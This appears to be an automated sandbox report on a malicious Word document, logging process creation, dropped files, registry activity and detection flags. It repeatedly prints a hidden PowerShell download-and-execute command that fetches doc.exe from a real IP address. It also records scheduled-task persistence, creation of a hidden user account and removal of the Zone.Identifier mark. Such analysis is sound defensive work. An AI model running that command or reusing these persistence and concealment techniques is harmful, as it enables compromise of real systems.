Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c...e.x.e.'..t......0.}...............f.....8.......D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................k.#k.....t................R.............}..v....@u......0.}...............f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................#k....P.f...............R.............}..v.....\|......0.}.............................D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................k.#k.....\|................R.............}..v....@}......0.}...............f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....X.......0.}...............f.....&.......D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................k.#k......................R.............}..v............0.}...............f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w......................#k....P.f...............R.............}..v....X.......0.}.............................D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................k.#k......................R.............}..v............0.}...............f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.}...............f.....<.......D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................k.#k......................R.............}..v............0.}...............f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .........#k....P.f...............R.............}..v............0.}...............f.............D...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................k.#k....P.................R.............}..v............0.}...............f.............D...............
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................8...........E.R.R.O.R.:. ...................$...............................................8.".............................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................8...........E.R.R.O.(.P.....................$.......................................................X.......x...............

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\doc.exe 'C:\Users\user\AppData\Roaming\doc.exe'
Source: C:\Users\user\AppData\Roaming\doc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp'
Source: C:\Users\user\AppData\Roaming\doc.exe	Process created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
Source: C:\Users\user\AppData\Roaming\doc.exe	Process created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
Source: C:\Users\user\AppData\Roaming\doc.exe	Process created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\doc.exe 'C:\Users\user\AppData\Roaming\doc.exe'
Source: C:\Users\user\AppData\Roaming\doc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp'
Source: C:\Users\user\AppData\Roaming\doc.exe	Process created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
Source: C:\Users\user\AppData\Roaming\doc.exe	Process created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
Source: C:\Users\user\AppData\Roaming\doc.exe	Process created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe

Source: C:\Users\user\AppData\Roaming\doc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0040F619 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREA10.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0040F80E CoInitializeSecurity,CoInitialize,CoCreateInstance,VariantInit,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\doc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_004120B8 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: C:\Users\user\AppData\Roaming\doc.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: doc[1].exe.0.dr, UX.WinForms/Form1.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: doc.exe.5.dr, UX.WinForms/Form1.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: maBdogbw.exe.9.dr, UX.WinForms/Form1.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.2.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.0.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.doc.exe.200000.0.unpack, UX.WinForms/Form1.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Suspicious powershell command line found

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''

Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 9_2_02173AEA push edx; retf
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_00401190 push eax; ret
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_00401190 push eax; ret
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_004144B1 push ebp; retf
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_00414550 push ebp; retf

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0040FA42 LoadLibraryA,GetProcAddress,

Source: initial sample	Static PE information: section name: .text entropy: 7.01726471119
Source: initial sample	Static PE information: section name: .text entropy: 7.01726471119
Source: initial sample	Static PE information: section name: .text entropy: 7.01726471119

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0040D418 NetUserAdd,NetLocalGroupAddMembers,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\doc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\doc.exe	File created: C:\Users\user\AppData\Roaming\maBdogbw.exe	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_004027D3 URLDownloadToFileW,ShellExecuteW,

Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_0040AC0A lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_0040A6C8 GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\AppData\Roaming\doc.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp'

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0040D508 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Roaming\doc.exe

File opened: C:\Windows\SysWOW64\:Zone.Identifier read attributes | delete

Contains functionality to hide user accounts

Show sources

Source: doc.exe

String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
